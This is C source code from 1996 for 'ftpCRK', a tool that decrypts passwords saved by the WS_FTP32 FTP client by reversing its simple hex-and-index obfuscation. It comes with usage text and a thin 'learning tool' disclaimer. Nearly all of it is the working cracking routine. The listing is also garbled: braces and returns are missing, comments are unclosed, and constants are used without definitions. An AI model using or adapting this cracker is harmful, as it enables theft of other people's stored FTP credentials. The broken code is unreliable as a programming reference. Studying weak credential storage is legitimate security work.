C Source Code to defeating WS_FTP32 Passwords

    This source code contains routines to defeat WS_FTP password
    encryption.  It is meant this source code to be used as a
    learning tool and not a cracking tool.  It is meant to show
    that false sense of security is worse than no security.

    *BorlandC 3.1 was used to compile this successfully.

    It is a crime to redistribute these routines in a commercial
    venture of any kind without permission or licensing agreement.

    (C)opyright 1996 Damaged Cybernetics

    If you have any questions or comments, please contact the
    following ppl via the Internet:

        Donald Moore   (MindRape) mindrape@goodnet.com
        Donald Staheli (Royce)     staheli@goodnet.com

        Web Page: www.goodnet.com/~staheli


/* Definitions for password validation */
#define VALID_PASSWORD          0

/* WS_FTP password definitions */

/* prototypes */
char StrHex2Dec(char cHex);
char CrackWSFTP(char *szPassword,char * szCrackedPassword);
void help(void);

   char StrHex2Dec(char cHex)
   ENT: char cHex - Some Hex value
   RET: decimal value

   Convert a string representation of a HEX value to a decimal value.
char StrHex2Dec(char cHex)
{   char cAdd = 0;

    if (cHex > 64) cAdd = 9;   /* if character is A or so we need to add 9 */

    /* now do a Logical AND against the value, this will cause the value to

       wrap around 0-15.  If the character contained A-F, it will add 9 to

       get the correct 10s position value.

    return(cHex & 15) + cAdd;


   char *CrackWSFTP(char *szPassword,char *szCrackedPassword)

   ENT: char *szPassword - Password to decrypt

        char *szCrackedPassword - preallocated string to WSFTP_PASSWORD_MAXLENGTH

                                  to hold the decrypted password.

   RET: INVALID_PASSWORD_LENGTH - password has incorrect length

        VALID_PASSWORD          - this was a valid password

   This routine will decrypt WSFTP32 encrypted passwords.  This routine was

   meant to be written for simplicity of understand how to crack passwords, so

   it can be optimized greatly for string pointer manipulations.


char CrackWSFTP(char *szPassword,char *szCrackedPassword)

{ char szCrackedPW[WSFTP_PASSWORD_MAXLENGTH+1]; /* Keep track of our decrypted password */

  int i;                                        /* loop counter                         */

  int iIndex = 0;                               /* keep track of our index              */

  /* Passwords must be evenly divisible! */

  if (strlen(szPassword) % 2)


 /* make sure the password is the correct length */

 if (strlen(szPassword) < 1 || strlen(szPassword) > WSFTP_PASSWORD_MAXLENGTH)


  for (i=0;i < strlen(szPassword);i+=2)


      /* cat 2 hex values into one hex value, then subtract it's index

         in the string from itself to produce the correct ASCII character


      szCrackedPassword[iIndex] = ((StrHex2Dec(szPassword[i]) << 4) |

                       (StrHex2Dec(szPassword[i+1])))  - iIndex;

      /* now increment our iIndex */



 /* append a null so our string is terminated */

 szCrackedPassword[iIndex] = NULL;



void help()


  puts("\nThis program will defeat WS_FTP32 password encryption.\n\n"

       "Usage: ftpCRK \n"

       "  i.e. ftpCRK 6162636465\n"



void main(int argc,char *argv[])
char szCrackedPassword[WSFTP_PASSWORD_MAXLENGTH];

  puts("WS_FTP32 Cracker - (C) 1996 Damaged Cybernetics (www.goodnet.com/~staheli)");
  if (argc != 2)

  switch (CrackWSFTP(argv[1],szCrackedPassword))
      case INVALID_PASSWORD_LENGTH:printf("Password has incorrect length.\n");
      case VALID_PASSWORD:printf("The password is: %s\n",szCrackedPassword);


© 1995 Damaged Cybernetics